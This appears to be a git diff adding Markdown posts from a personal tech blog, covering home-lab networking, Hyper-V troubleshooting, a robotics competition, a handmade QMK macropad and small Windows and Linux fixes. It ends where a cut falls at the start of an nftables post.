content/posts/how-to-have-a-functional-dhcrelay.md
Normal file
28
content/posts/how-to-have-a-functional-dhcrelay.md
Normal file
|
|
@ -0,0 +1,28 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["Windows Server", "dhcp", "linux", "homelab"]
|
||||||
|
date = 2016-03-05T05:20:54Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/how-to-have-a-functional-dhcrelay"
|
||||||
|
tags = ["Windows Server", "dhcp", "linux", "homelab"]
|
||||||
|
title = "How to have a functional dhcrelay"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I'm dumb. Or ignorant. Or inexperienced. I haven't decided which.
|
||||||
|
|
||||||
|
`dhcrelay` only gets proper responses if it's listening on both the interface that it's actually listening on for requests and the one where it will get the responses.
|
||||||
|
|
||||||
|
My command line for it to forward dhcp requests to my Windows dhcp server in my virtual lab is:
|
||||||
|
|
||||||
|
/usr/bin/dhcrelay -4 -d -i eth1 -i eth2 10.x.x.x
|
||||||
|
|
||||||
|
`eth1` is the interface with the Windows dhcp server on its subnet
|
||||||
|
|
||||||
|
`eth2` is the interface with the clients on it
|
||||||
|
|
||||||
|
`10.x.x.x` is the address of the Windows dhcp server
|
||||||
|
|
||||||
|
This is run on my arch (yes, I know. Debian took longer than Windows to install. The only stuff on it is in `base`, `vim`, and `dhcp`) gateway VM. I could also stand up a Windows box and have it do NAT, but that doesn't use 512MB of RAM nearly as happily.
|
||||||
|
|
||||||
55
content/posts/hyper-v-manager-throws-obscure-errors.md
Normal file
55
content/posts/hyper-v-manager-throws-obscure-errors.md
Normal file
|
|
@ -0,0 +1,55 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["hyper-v", "Windows Server", "PowerShell", "Server 2019"]
|
||||||
|
date = 2018-08-16T03:25:14Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/hyper-v-manager-throws-obscure-errors"
|
||||||
|
tags = ["hyper-v", "Windows Server", "PowerShell", "Server 2019"]
|
||||||
|
title = "Hyper-V Manager throws obscure errors if the target computer calls itself something else than you do"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I started testing Server 2019 as a Hyper-V host a few days ago, but getting the GUI manager to connect was a bit challenging. This article will be about as much documentation for me to set this machine up again as it will be instructive. <!-- excerpt -->
|
||||||
|
|
||||||
|
This machine is non domain joined.
|
||||||
|
|
||||||
|
First, name the computer what you want its final DNS name to be with `Rename-Computer`. Then reboot so you will avoid the issue described in the second half of the post.
|
||||||
|
|
||||||
|
Secondly, get a remote shell into it. `Enable-PSRemoting`, and ensure the firewall rules are allowing connections from the subnets you're OK with remote connections from with `Get-NetFirewallRule` piped to `Get-NetFirewallAddressFilter` and `Set-NetFirewallAddressFilter`.
|
||||||
|
|
||||||
|
Next, enable CredSSP with `Enable-WSManCredSSP -Role Server` and ensure that the appropriate fresh credential delegation, trusted hosts, and permit-CredSSP GPOs are applied on the client. Check also that the WinRM service is running on the client, and if there are still issues with lacking "permission to complete this task" while connecting with the manager, also run `Enable-WSManCredSSP` with the client role, delegating to the appropriate host.
|
||||||
|
|
||||||
|
Then, hopefully, the Hyper-V manager will just connect.
|
||||||
|
|
||||||
|
--------------
|
||||||
|
|
||||||
|
Now, for the problem I had, and as many details as feasible so the next person Googling for it will find this post.
|
||||||
|
|
||||||
|
The error that appeared was:
|
||||||
|
|
||||||
|
> "Hyper-V encountered an error trying to access an object on computer 'LF-HV02' because the object was not found. The object might have been deleted. Verify that the Virtual Machine Management service on the computer is running".
|
||||||
|
|
||||||
|
{% image(name="XH8q54D.png") %}
|
||||||
|
a
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
I then investigated the event logs on the target system. `In the WMI-Activity/Operational` log, I found an error with event ID 5858, and result code `0x80041002`:
|
||||||
|
|
||||||
|
```
|
||||||
|
Id = {8FA5E5DB-34E0-0001-31E6-A58FE034D401};
|
||||||
|
ClientMachine = WIN-QKHK3OGNV1V;
|
||||||
|
User = WIN-QKHK3OGNV1V\Administrator;
|
||||||
|
ClientProcessId = 2532;
|
||||||
|
Component = Unknown;
|
||||||
|
Operation = Start IWbemServices::GetObject - root\virtualization\v2 : Msvm_VirtualSystemManagementService.CreationClassName="Msvm_VirtualSystemManagementService",Name="vmms",SystemCreationClassName="Msvm_ComputerSystem",SystemName="LF-HV02";
|
||||||
|
ResultCode = 0x80041002;
|
||||||
|
PossibleCause = Unknown
|
||||||
|
```
|
||||||
|
|
||||||
|
{% image(name="event5858.png") %}
|
||||||
|
Screenshot of the event viewer showing the above message.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
When poking around at the mentioned CIM object with `Get-CimInstance -ClassName 'Msvm_VirtualSystemManagementService' -Namespace 'root\virtualization\v2'`, I found that the system name was some randomized name starting with `WIN-`. So, I renamed it to what it was supposed to be called with `Rename-Computer`, rebooted, and that fixed the issue.
|
||||||
|
|
||||||
67
content/posts/i-competed-in-skills-canada-robotics.md
Normal file
67
content/posts/i-competed-in-skills-canada-robotics.md
Normal file
|
|
@ -0,0 +1,67 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["3dprinting", "electronics", "school"]
|
||||||
|
date = 2019-06-13T18:01:00Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/i-competed-in-skills-canada-robotics"
|
||||||
|
tags = ["3dprinting", "electronics", "school"]
|
||||||
|
title = "I competed in Skills Canada Robotics"
|
||||||
|
featuredImage = "../images/robotics-header-1.jpg"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Skills Canada hosts a robotics competition for the secondary level every year with a different task each time. Competitors build remote controlled robots ahead of time which they bring with them to the competition. There is also an autonomous portion of the competition where we build robots on the competition floor using a set of parts for a challenge which is revealed on competition day.<!-- excerpt -->
|
||||||
|
|
||||||
|
Our team achieved first place at the national competition, but we are not continuing to worlds as it is not a worlds qualifying year (though a former team from my school is!).
|
||||||
|
|
||||||
|
{% image(name="robotics-court.jpg") %}
|
||||||
|
Photo of the robotics court. It is made of wood and divided into two sides. Some robots are visible in it, and there is a substantial crowd surrounding it from the back. Students are visible working in the background.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
This is the court we played on with some other teams on it. It has hills on both sides (themed after the Citadel in Halifax), with ammo boxes full of foam golf balls on top of the hills and on the court floor. The objective is to pick up and deliver these foam golf balls to the other side using a maximum of 2 remote operated robots (autonomous robots can be used in addition to these two but few teams chose to do this).
|
||||||
|
|
||||||
|
Scoring is as follows:
|
||||||
|
- 1 point for each ball that is delivered onto the court floor of the other side of the court
|
||||||
|
- 2 points for each ball that is in the nets on the hills at the end of the game
|
||||||
|
- 3 points for each ball in the nets on the opposing team's robots at the end of the game
|
||||||
|
- 10 points if all robots with nets end the game on top of the hill as the buzzer sounds
|
||||||
|
|
||||||
|
We built two identical robots for the competition, where we 3D printed almost all of the mechanical parts. The robot design we built uses hacked car vacuums to suck up the foam golf balls into a tube where they are buffered. A rotating valve similar to a ball valve is used to allow balls to flow into the launcher and to block off suction to the launcher while collecting balls.
|
||||||
|
|
||||||
|
To launch the balls, we use a mechanism similar to a pitching machine which launches balls with two spinning wheels. Balls are pushed into the pitching machine with a server fan.
|
||||||
|
|
||||||
|
{% image(name="robotics-internals.jpg") %}
|
||||||
|
A top view cutaway diagram of the robot internals from a computer aided design program. It shows the path balls travel through the robot: they come in the front then pass a mesh with the vacuum behind it, then a rotating mechanism similar to a ball valve, then there is a straight barrel with opposing wheels that would launch the balls.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
On the front of the robots, we built a height adjustment mechanism using a 270-degree servo and a rack and pinion from a Tetrix Max kit we got from the last time we went to Nationals.
|
||||||
|
|
||||||
|
## Technical Details
|
||||||
|
- there is one 12V 5000mAh lithium polymer battery powering everything
|
||||||
|
- motor controllers are: Vantec RDFR22 and Sabertooth 2x25, the Vantec for our 4 motor drive system and the Sabertooth for the vacuum and the height adjustment linear actuator. The launcher is handled with a RC relay board which provides on/off control for the fan and motors
|
||||||
|
- RC system: we use Jumper T8SG-v2 Plus radios on the FlySky protocol; there is a 10 channel receiver installed, and we use 8 of those channels for controlling the robot. I've used a DigiSpark clone board to extend the servo input range of our nozzle height adjustment servo to get full travel as well as output a PWM signal to slow down the server fan (see https://github.com/lf-/ServoExtender).
|
||||||
|
|
||||||
|
## Evaluation of techniques used
|
||||||
|
We made extensive use of various fusion welding techniques on the plastics in this year’s design to varying degrees of success. The launcher was heat staked on very successfully. Friction welding was used on the assembly of the vacuum and the tube on it as well as attaching that vacuum and tube assembly to the launcher, also successfully.
|
||||||
|
|
||||||
|
We superglued on the fan bracket, which later failed on both robots, one at competition and one in practice. The first one fell off because the robot fell on its back (oops), so I friction welded it back on. The robot fell over again in practice (oops) and broke again so I heat staked it back on (friction welding is hard to redo over an existing weld). The other one fell off at competition, and I don’t think it was because the robot fell over. As it was a glue failure, I friction welded it back on and it was fine for the rest of the day.
|
||||||
|
|
||||||
|
Hot glue was used to attach the aiming device, which was generally successful, though airline shipping damage caused us to need to reattach one of them at orientation. Hot glue and velcro have both been used to attach electronics, and I am not satisfied with the results of either on the aluminum buck converters. Further research is required, possibly involving 3d printed backing plates.
|
||||||
|
|
||||||
|
## Autonomous competition
|
||||||
|
The Skills competition had a segment where competitors were to build robots that drive themselves through a maze and drop off plastic spools in a couple of positions on the court.
|
||||||
|
|
||||||
|
{% image(name="autonomous-robot.jpg") %}
|
||||||
|
Photo of a small robot made of aluminum pieces stuck together with screws, sitting on a foam tile. There is a wall used in the course visible in the background. There is indistinct handwriting visible on the front of the robot. The robot has a controller circuit board on the top of it and two servo motors on the front with arms attached to them. Near the arms, there are brightly coloured spools as would be used for thread for sewing.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
|
||||||
|
We built the simplest and smallest possible frame we could think of, using staggered motors to make it narrower.
|
||||||
|
|
||||||
|
The spools were managed by two servos with arms holding pins inside the spools. When the spools are to be dropped, the servo with the pin is simply lifted and the spool deposited.
|
||||||
|
|
||||||
|
Our team was the only team to build a significant piece of software ahead of the competition (which you are allowed to do), specifically, I wrote a system that allows for the autonomous robot to be manually driven into each desired position, and the motor encoder counts measured. These counts are dumped to the serial port, and they can then simply be pasted into the program to drive automatically. This turned a 2 day programming task into a 2 hour driving task.
|
||||||
|
|
||||||
|
More photos of the robots and of the internal mechanisms, with an emphasis on the 3D printing are available from [https://imgur.com/a/de6Y6zK](https://imgur.com/a/de6Y6zK).
|
||||||
|
|
||||||
|
|
@ -0,0 +1,110 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["electronics", "firmware", "mechanical", "keyboards", "qmk"]
|
||||||
|
date = 2019-03-07T07:15:38Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
image = "/blog/content/images/2019/03/macropad-in-hand-small.jpg"
|
||||||
|
path = "/blog/i-designed-and-built-a-mechanical-macropad-numpad"
|
||||||
|
tags = ["electronics", "firmware", "mechanical"]
|
||||||
|
title = "I designed and built a mechanical macropad/numpad!"
|
||||||
|
featuredImage = "../images/macropad-in-hand-small-1.jpg"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
More images are available at the [imgur gallery documenting this project](https://imgur.com/a/aq9rSBs).
|
||||||
|
|
||||||
|
I built a macropad based on an Arduino Leonardo 2 years ago to rectify my Unicomp Model M keyboard lacking media buttons (volume, media, and others). Around June 2018, I further developed that macropad by adding a 3D printed case for it:
|
||||||
|
<!-- excerpt -->
|
||||||
|
|
||||||
|
{% image(name="aeJcTos.jpg") %}
|
||||||
|
Photo of the old macropad. It's a particularly low quality telephone keypad in a very tall red 3d printed case with lots of visible sharp edges. There are places for four screws at the corners but only two have been installed.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
It served me well, but it was always frustrating to have keys not always register when pressed, and I wanted to get a Tenkeyless keyboard in order to get more mouse space and place my keyboard more ergonomically.
|
||||||
|
|
||||||
|
The obvious solution was to get some sort of mechanical numpad, but my limited research those made it abundantly clear that not only were these difficult to get ahold of in Canada, I probably could not get media buttons with them, somewhat defeating the purpose of getting one. Plus, I wanted an excuse to do some electronics.
|
||||||
|
|
||||||
|
I came up with the following design requirements:
|
||||||
|
- Must have a layer indication on the front
|
||||||
|
- Should have a numpad layout in case I want to use it as one
|
||||||
|
- Must have keys outside of the numpad to toggle between modes and provide other functionality
|
||||||
|
- Should have mechanical switches because it is not worth doing anything less
|
||||||
|
|
||||||
|
This led me to use a block of 4x5 keys and a smaller block of 4x2 keys. I knew that addressable LEDs such as the WS2812B or the SK6812 were a good solution to layer indication at the front, requiring less layout work than installing a multiplexer and several single colour LEDs, and providing a good visual indication of layer state with a single glance. These can be used in the future for displaying some sort of system state of the connected computer.
|
||||||
|
|
||||||
|
I chose to use plate mount Cherry MX Black switches in this project. For context, many mechanical keyboards are designed such that the keyswitches clip into a plate, and the circuit board is subsequently inserted onto them from the back. An alternative to these is PCB mount switches which rely on the circuit board for mechanical stability, producing less rigid action but avoiding the cost of a plate. I was building a case anyway, so plate mount was the obvious choice.
|
||||||
|
|
||||||
|
### Design phase
|
||||||
|
|
||||||
|
I began by designing the PCB in KiCad based partially on [this guide](https://github.com/ruiqimao/keyboard-pcb-guide) on GitHub, and I found [this blog post on switch matrices](http://blog.komar.be/how-to-make-a-keyboard-the-matrix/) very helpful for understanding how the diode arrangement works with the keyswitches and how to draw it.
|
||||||
|
|
||||||
|
There are a few comments to be made about that guide: it isn't updated to KiCad 5.x, and the built in KiCad libraries have been improved significantly since 4.x, and it uses a crystal symbol which can result in the wrong pinout using the recommended crystal.
|
||||||
|
|
||||||
|
Its suggestion of using some custom libraries for crystals and other common components is questionable based on a problem I encountered where my microcontroller was not communicating over the programming interface. I was not familiar with the available types of crystal and didn't know that there were different pinouts for some of them. The custom library only had the one, which happened to not actually match with the suggested part's real pinout. If I had used the default library, I would have probably noticed that there were multiple types.
|
||||||
|
|
||||||
|
{% image(name="kicad-crystals.png") %}
|
||||||
|
Screenshot of the KiCad symbol picking dialog, with a part called "Crystal_GND23" selected, having ground on pins 2 and 3. Also listed is a "Crystal-GND24" with ground on pins 2 and 4.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
While designing the schematic, I found [application note AVR042](http://ww1.microchip.com/downloads/en/appnotes/atmel-2521-avr-hardware-design-considerations_applicationnote_avr042.pdf) very helpful for explaining how to design the circuit for the reset circuit, appropriate decoupling and more.
|
||||||
|
|
||||||
|
### Manufacture
|
||||||
|
|
||||||
|
I chose JLCPCB for getting my PCBs manufactured because they were at least a third of the cost of the other options I looked at, and promised very impressive turnaround times for that price. In all, I spent C$17 on circuit boards, including shipping such that they took 8 days from order to landing on my doorstep. The PCBs turned out quite nice to my untrained eye:
|
||||||
|
|
||||||
|
{% image(name="macropad-front-small.jpg") %}
|
||||||
|
Photo of the front of a stack of rectangular green number pad shaped circuit
|
||||||
|
boards with no parts populated yet.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
{% image(name="macropad-back-small.jpg") %}
|
||||||
|
Like the previous photo, but the back of the boards.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
All components on the board were hand soldered with only slightly less flux than would be used by Louis Rossmann. This was my first project using SMD parts, and I can state unequivocally that 0806 sized parts are more than possible to solder by hand, and 0.8mm TQFP packages are not too bad either. I purchased a T18-S7 well tip in order to drag solder more effectively, which was largely successful, though might work even better with nicer flux.
|
||||||
|
|
||||||
|
Magnification was not required for soldering, however it was critical to inspection of the soldering of the microcontroller, which revealed a few solder bridges. I used a jeweler's loupe.
|
||||||
|
|
||||||
|
Parts including switches and all electronics were purchased from Digi-Key, who, true to their reputation, had the parts on my doorstep the next day. The bill of materials parts cost is around C$52 with a quantity of 1.
|
||||||
|
|
||||||
|
The case and plate was printed in translucent PLA. It could have probably been printed in white and the LEDs would have shown just fine. I designed this case in Fusion 360, which I am fairly familiar with, having designed projects such as my team's [Skills Canada robotics design](/blog/i-competed-in-skills-canada-robotics).
|
||||||
|
|
||||||
|
### Firmware
|
||||||
|
|
||||||
|
This was a bit of a problem stage in development to some degree, in particular getting the ISP programmer to work. These all turned out to be hardware and software issues unrelated to the actual ISP programmer. I dodged a bullet by using Linux regularly, because the symptoms of using avrdude on Windows are identical to the symptoms of the crystal not working or the cable being disconnected, which could have been some horrific debugging.
|
||||||
|
|
||||||
|
The programmer in question is a Deek-Robot USBTinyISP obtained from Universal-Solder, which is an online shop based in Yorkton, SK carrying many cheap Chinese development boards for a very minimal premium over buying them on eBay. I'd strongly recommend them if you live in the Prairies, because using them saved me several weeks of wait time.
|
||||||
|
|
||||||
|
I chose qmk because it was posted somewhere online that it was better than tmk, and it does the job. Currently this part of the project is developed as a fork of the qmk repository, but I can likely push my keyboard configuration upstream.
|
||||||
|
|
||||||
|
There are many strong words that could be said about qmk documentation, but I cannot and will not say any of them until I've submitted pull requests to improve it.
|
||||||
|
|
||||||
|
I strongly recommend using the qmk bootloader, because it appears to be the only one which allows you to actually get out of DFU mode on keyboard startup, albeit by pressing a key (please tell me if I'm wrong on this!).
|
||||||
|
|
||||||
|
I found out only through a reddit post that there is the `:production` target in the qmk Makefile that allows you to build a full image including the bootloader and the application image which you can flash to the keyboard to bootstrap it. This would be used for example by running `make handwired/mech_macropad:default:production` where `handwired/mech_macropad` is the path under `keyboards/` for the keyboard you want to compile for and `default` is the keymap.
|
||||||
|
|
||||||
|
### Learnings
|
||||||
|
|
||||||
|
I learned the hard way to check footprints against datasheets and to make sure that there are no unconnected pins which are not intended to be that way in the schematic. This happened when I had the wrong schematic symbol and footprint for my crystal. I'd like to thank the folks at CrashBang Labs for their invaluable help in debugging this issue.
|
||||||
|
|
||||||
|
I need to exercise more care in avoiding getting sticky flux into switches. Thankfully, that was learned on the reset switch rather than a keyswitch.
|
||||||
|
|
||||||
|
Many of the earlier tracks on the circuit board design were pointlessly thin, and power tracks could be even thicker than they are. I will consider using polygons for both power and ground more aggressively in future designs, as they significantly simplify routing, reduce resistance, and improve EMI characteristics (which I look forward to learning about in Electrical Engineering over the next few years).
|
||||||
|
|
||||||
|
### Status
|
||||||
|
|
||||||
|
This project works with all designed features, though I need to invent more macros. Currently, I have music playback, volume controls, like/dislike in Google Play Music Desktop Player, and Discord mic mute.
|
||||||
|
|
||||||
|
I found a useful trick for these sorts of shortcuts that are not default OS functions is to use modifiers (ctrl, alt, shift) with high F keys (F13-F24 are supported on Windows and Mac, but few keyboards actually implement them, so they will not conflict with any existing shortcuts).
|
||||||
|
|
||||||
|
#### Source availability
|
||||||
|
|
||||||
|
This project is open source hardware, published under the terms of the TAPR Open Hardware License. The firmware is published under the GNU General Public License v2.
|
||||||
|
|
||||||
|
[Firmware](https://github.com/lf-/qmk_firmware)
|
||||||
|
|
||||||
|
[Hardware](https://github.com/lf-/reality/tree/master/mechanical-macropad)
|
||||||
|
|
||||||
|
Mechanical: I will publish this once I fix some clearance issues around the USB port to avoid requiring a Dremel.
|
||||||
|
|
||||||
20
content/posts/i-have-rss-now.md
Normal file
20
content/posts/i-have-rss-now.md
Normal file
|
|
@ -0,0 +1,20 @@
|
||||||
|
+++
|
||||||
|
date = "2020-11-21"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/i-have-rss-now"
|
||||||
|
tags = ["site"]
|
||||||
|
title = "I have an RSS feed now"
|
||||||
|
+++
|
||||||
|
|
||||||
|
Hello!
|
||||||
|
|
||||||
|
The full content on this site is available by RSS at
|
||||||
|
https://lfcode.ca/rss.xml. I can make no promises as to how fabulously RSS
|
||||||
|
readers will render the full post contents without some kind of styling, but
|
||||||
|
they are included.
|
||||||
|
|
||||||
|
If you have any further requests on how I can make this site work better for
|
||||||
|
you, please email me at the address on the [About](/about) page or file an
|
||||||
|
issue on the [source repo](https://github.com/lf-/blog).
|
||||||
|
|
||||||
|
Enjoy your syndication adventures~
|
||||||
24
content/posts/introducing-my-new-theme.md
Normal file
24
content/posts/introducing-my-new-theme.md
Normal file
|
|
@ -0,0 +1,24 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["meta", "ghost"]
|
||||||
|
date = 2016-03-06T04:40:37Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/introducing-my-new-theme"
|
||||||
|
tags = ["meta", "ghost"]
|
||||||
|
title = "Introducing my new theme"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
Recently, I had enough of the Arabica theme for Ghost. Put simply, it was ancient, didn't look that great anyway, and was missing a bunch of newer Ghost features.
|
||||||
|
|
||||||
|
Its replacement is a fork of lanyon-ghost, itself a fork of lanyon (a theme for Jekyll).
|
||||||
|
|
||||||
|
Currently, all I've changed is the fonts, and I switched the homepage to display full posts, as it's quite irritating to have to click on each one to read it (while I'm at it, it would be *great* if Ghost allowed to put a mark where the fold in the page is, so that longer posts don't eat up all the space on the page).
|
||||||
|
|
||||||
|
The fonts in use are the beautiful Charter (main content), Fira Sans (headings, other text), and Source Code Pro (monospace/code).
|
||||||
|
|
||||||
|
There's also an author page that shows the author's description, image and such along with their posts.
|
||||||
|
|
||||||
|
Here's the code: https://github.com/lf-/lanyon-ghost
|
||||||
|
|
||||||
18
content/posts/launching-powershell-using-the-win32-api.md
Normal file
18
content/posts/launching-powershell-using-the-win32-api.md
Normal file
|
|
@ -0,0 +1,18 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["windows", "PowerShell", "win32"]
|
||||||
|
date = 2016-11-29T04:20:46Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/launching-powershell-using-the-win32-api"
|
||||||
|
tags = ["windows", "PowerShell", "win32"]
|
||||||
|
title = "Launching PowerShell using the Win32 API"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I was working on a personal project in C on Windows when I stumbled upon a really strange roadblock: a PowerShell instance would not actually run the script given to it when started via Windows API but it would when launched manually from a `cmd.exe`.
|
||||||
|
|
||||||
|
Eventually the realisation came to me: PowerShell doesn't like the `DETACHED_PROCESS` option for `CreateProcess()`. I have no idea what it was doing with it there, but it didn't involve actually working.
|
||||||
|
|
||||||
|
I changed it to `CREATE_NO_WINDOW` and all is fine in the world.
|
||||||
|
|
||||||
34
content/posts/make-meshmixer-display-things-usably.md
Normal file
34
content/posts/make-meshmixer-display-things-usably.md
Normal file
|
|
@ -0,0 +1,34 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["3dprinting", "meshmixer"]
|
||||||
|
date = 2018-02-19T22:44:34Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/make-meshmixer-display-things-usably"
|
||||||
|
tags = ["3dprinting", "meshmixer"]
|
||||||
|
title = "Meshmixer: Turn Off Smooth Display"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
The default display in Meshmixer is not ideal for working with technical models.
|
||||||
|
|
||||||
|
The setting responsible for this silliness is called "Mesh Normal Mode", which is unclear to most people who are not professional graphics programmers. Set that to "Face Normals" and it will display without making the model look like an amorphous blob. Alternately, hold spacebar and select the sphere that has vertices as in the picture below.
|
||||||
|
|
||||||
|
### Setting in the "Hotbox"
|
||||||
|
|
||||||
|
{% image(name="meshmixer-setting-fix.png") %}
|
||||||
|
Screenshot of the "hotbox" that appears when you hold space in meshmixer. There is a sphere with visible vertices highlighted, in the "Mesh" section under a subheading labeled "normals".
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
### Default
|
||||||
|
|
||||||
|
{% image(name="meshmixer-default.png") %}
|
||||||
|
A photo of some 3d model. There is strange visual artefacting around holes and edges are not crisp.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
### Face Normals
|
||||||
|
|
||||||
|
{% image(name="meshmixer-fixed.png") %}
|
||||||
|
A photo of the same 3d model. All the edges are sharp.
|
||||||
|
{% end %}
|
||||||
|
|
||||||
|
|
@ -0,0 +1,16 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2019-08-25T04:49:46Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/make-windows-10-mobile-hotspot-feature-stay-on-properly"
|
||||||
|
title = "Make Windows 10 \"Mobile Hotspot\" feature stay on properly"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I am currently living somewhere where there is only wired access available and I would rather just use my computer as a router. One small problem: Windows seems to turn off the hotspot on random intervals, even if it is set not to turn off when not in use to "save power". The following registry key manipulation appears to fix it:
|
||||||
|
|
||||||
|
`Set-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\SharedAccess -Name EnableRebootPersistConnection -Value 1`
|
||||||
|
|
||||||
|
[https://support.microsoft.com/en-ca/help/4055559/ics-doesn-t-work-after-computer-or-service-restart-on-windows-10](https://support.microsoft.com/en-ca/help/4055559/ics-doesn-t-work-after-computer-or-service-restart-on-windows-10)
|
||||||
|
|
||||||
16
content/posts/making-the-makerfarm-pegasus-usable.md
Normal file
16
content/posts/making-the-makerfarm-pegasus-usable.md
Normal file
|
|
@ -0,0 +1,16 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2019-02-15T04:45:44Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/making-the-makerfarm-pegasus-usable"
|
||||||
|
title = "Making the MakerFarm Pegasus usable"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I made the mistake of purchasing a MakerFarm Pegasus around August 2017. It was alluring: proper E3D extruder and hot end, more build volume and no wait time unlike the Prusa MK2S for about the same price. Unfortunately for that price you do not get as much printer by a large margin.
|
||||||
|
|
||||||
|
The primary issue with the machine in my experience is bed leveling. On newer models of the Pegasus, the bed is no longer supported on springs so the only method of leveling is manual mesh leveling, which has a very poor user experience on Marlin. I chose to use an optical bed probe, but it appears to vary in Z offset based mainly on the phase of the moon, so it needs to be babystepped at the start of every print, which is quite annoying.
|
||||||
|
|
||||||
|
I have developed a series of printed upgrades to make the machine either work better or work properly.
|
||||||
|
|
||||||
|
|
@ -0,0 +1,22 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["hyper-v", "linux"]
|
||||||
|
date = 2016-12-18T04:46:03Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/ms-documentation-sucks-or-how-i-got-my-vm-hostnames-to-be-set-automatically-from-kickstart"
|
||||||
|
tags = ["hyper-v", "linux"]
|
||||||
|
title = "MS Documentation sucks (or how I got my VM hostnames to be set automatically from kickstart)"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I wanted to automate my linux VM deployment on my Hyper-V based lab infrastructure. One small flaw: while DHCP does automatically update DNS, it does *not* do too much when your VM is named "localhost". I wanted to make the fedora deployment completely automated... which it is after I wrote a kickstart, except you can't get into the new box because you can't find its IP address.
|
||||||
|
|
||||||
|
I wrote a small tool to deal with this issue:
|
||||||
|
https://github.com/lf-/kvputil
|
||||||
|
|
||||||
|
You want the variable `VirtualMachineName` in `/var/lib/hyperv/.kvp_pool_3`.
|
||||||
|
|
||||||
|
Documentation that took way too long to find:
|
||||||
|
https://technet.microsoft.com/en-us/library/dn798287.aspx
|
||||||
|
|
||||||
26
content/posts/my-network-ups-tools-dont-work.md
Normal file
26
content/posts/my-network-ups-tools-dont-work.md
Normal file
|
|
@ -0,0 +1,26 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["homelab", "linux", "raspberry-pi", "udev"]
|
||||||
|
date = 2016-07-09T17:10:05Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/my-network-ups-tools-dont-work"
|
||||||
|
tags = ["homelab", "linux", "raspberry-pi", "udev"]
|
||||||
|
title = "NUT not finding my UPS + fix"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I use a CyberPower CP1500AVRLCD as a UPS in my lab. I'm just now getting more stuff running on it to the point that I want automatic shutdown (because it won't run for long with the higher power usage of more equipment). So, I plugged it into the pi that was running as a cups-cloud-print server and sitting on a shelf with my network equipment. The problem was that the driver for it in NUT didn't want to load. As is frighteningly common, it's a permissions problem:
|
||||||
|
|
||||||
|
Here's the log showing the issue:
|
||||||
|
|
||||||
|
Jul 09 16:49:58 print_demon upsdrvctl[8816]: USB communication driver 0.33
|
||||||
|
Jul 09 16:49:58 print_demon upsdrvctl[8816]: No matching HID UPS found
|
||||||
|
Jul 09 16:49:58 print_demon upsdrvctl[8816]: Driver failed to start (exit status=1)
|
||||||
|
|
||||||
|
Here's the udev rule that fixes it:
|
||||||
|
|
||||||
|
ACTION=="ADD",SUBSYSTEM=="usb",ATTR{idProduct}=="0501",ATTR{idVendor}=="0764",MODE="0660",GROUP="nut"
|
||||||
|
|
||||||
|
What this does is, when udev gets an event of the device with USB product id 0501 and vendor id 0764 being added to the system, it changes the permissions on the device files (think /dev/bus/usb/001/004 and /devices/platform/soc/20980000.usb/usb1/1-1/1-1.3) to allow group `nut` to read and write to it, allowing comms between the NUT driver and the device.
|
||||||
|
|
||||||
48
content/posts/nftables-redirect-not-working-fix.md
Normal file
48
content/posts/nftables-redirect-not-working-fix.md
Normal file
|
|
@ -0,0 +1,48 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["nftables", "linux"]
|
||||||
|
date = 2016-03-07T00:33:40Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/nftables-redirect-not-working-fix"
|
||||||
|
tags = ["nftables", "linux"]
|
||||||
|
